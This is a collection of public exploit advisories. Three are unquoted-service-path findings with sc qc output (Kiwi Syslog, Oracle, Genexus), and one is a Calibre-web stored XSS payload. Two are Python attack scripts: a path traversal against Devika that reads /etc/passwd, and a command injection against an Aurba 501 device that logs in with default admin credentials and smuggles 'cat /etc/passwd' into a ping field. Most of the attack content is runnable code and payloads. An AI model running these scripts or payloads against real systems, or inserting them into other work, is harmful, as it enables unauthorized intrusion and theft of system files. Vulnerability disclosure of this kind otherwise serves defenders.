# Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.kiwisyslog.com/ # Software Link: https://www.kiwisyslog.com/downloads # Version: Software Version 9.6.7.1 # Tested on: Windows 10 Pro x64 1. Description: SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs 2. Proof C:\>sc qc "Kiwi Syslog Server" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Kiwi Syslog Server TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files (x86)\Syslogd\Syslogd_Service.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Kiwi Syslog Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation

# Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path # Date: 2024-07-31 # Exploit Author: Milad Karimi (Ex3ptionaL) # Contact: miladgrayhat@gmail.com # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # MiRROR-H: https://mirror-h.org/search/hacker/49626/ # Vendor Homepage: https://www.oracle.com/ # Software Link: https://www.oracle.com/ # Version: 12c Release 1 # Tested on: Windows 10 Pro x64 C:\>sc qc "OracleDBConsoleorcl" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OracleDBConsoleorcl TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OracleDBConsoleorcl DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045 OS Manufacturer: Microsoft Corporation

# Exploit Title: Stored XSS in Calibre-web # Date: 07/05/2024 # Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache) # Vendor Homepage: (https://github.com/janeczku/calibre-web/) # Version: 0.6.21 - Romesa # Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4 # CVE: CVE-2024-39123 ## Vulnerability Description Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Upload a new book. 3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint. 4. In the `Comments` field, input the following payload: <a href=javas%1Bcript:alert()>Hello there!</a> 4. Save the changes. 5. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.

# Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter # Google Dork: N/A # Date: 2024-06-29 # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/X) # Vendor Homepage: https://devikaai.co/ # Software Link: https://github.com/stitionai/devika # Version: v1 # Tested on: Windows 11 Home Edition # CVE: CVE-2024-40422 #!/usr/bin/python import argparse import requests def exploit(target_url): url = f'http://{target_url}/api/get-browser-snapshot' params = { 'snapshot_path': '../../../../etc/passwd' } response = requests.get(url, params=params) print(response.text) if __name__ == "__main__": parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.') parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True) args = parser.parse_args() exploit(args.target)

#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path Service Path #Exploit Author : SamAlucard #Exploit Date: 2024-07-31 #Vendor : Genexus #Version : Genexus Protection Server 9.7.2.10 #Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;; #Vendor Homepage : https://www.genexus.com/es/ #Tested on OS: Windows 10 Pro #Analyze PoC : ============== C:\>sc qc protsrvservice [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: protsrvservice TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : ProtSrvService DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem

# Exploit Title: Remote Command Execution | Aurba 501 # Date: 17-07-2024 # Exploit Author: Hosein Vita # Vendor Homepage: https://www.hpe.com # Version: Aurba 501 CN12G5W0XX # Tested on: Linux import requests from requests.auth import HTTPBasicAuth def get_input(prompt, default_value): user_input = input(prompt) return user_input if user_input else default_value base_url = input("Enter the base URL: ") if not base_url: print("Base URL is required.") exit(1) username = get_input("Enter the username (default: admin): ", "admin") password = get_input("Enter the password (default: admin): ", "admin") login_url = f"{base_url}/login.cgi" login_payload = { "username": username, "password": password, "login": "Login" } login_headers = { "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": base_url, "Connection": "close" } session = requests.Session() requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) # Login to the system response = session.post(login_url, headers=login_headers, data=login_payload, verify=False) # Check if login was successful if response.status_code == 200 and "login failed" not in response.text.lower(): print("Login successful!") # The command to be executed on the device command = "cat /etc/passwd" ping_ip = f"4.2.2.4||{command}" # Data to be sent in the POST request data = { "ping_ip": ping_ip, "ping_timeout": "1", "textareai": "", "ping_start": "Ping" } # Headers to be sent with the request headers = { "Accept-Encoding": "gzip, deflate, br", "Content-Type": "application/x-www-form-urlencoded", "Origin": base_url, "Referer": f"{base_url}/admin.cgi?action=ping", "Connection": "close" } # Sending the HTTP POST request to exploit the vulnerability exploit_url = f"{base_url}/admin.cgi?action=ping" response = session.post(exploit_url, headers=headers, data=data, verify=False) if any("root" in value for value in response.headers.values()): print("Exploit successful! The /etc/passwd file contents are reflected in the headers:") print(response.headers) else: print("Exploit failed. The response headers did not contain the expected output.") else: print("Login failed. Please check the credentials and try again.") # Print the response headers for further analysis print(response.headers)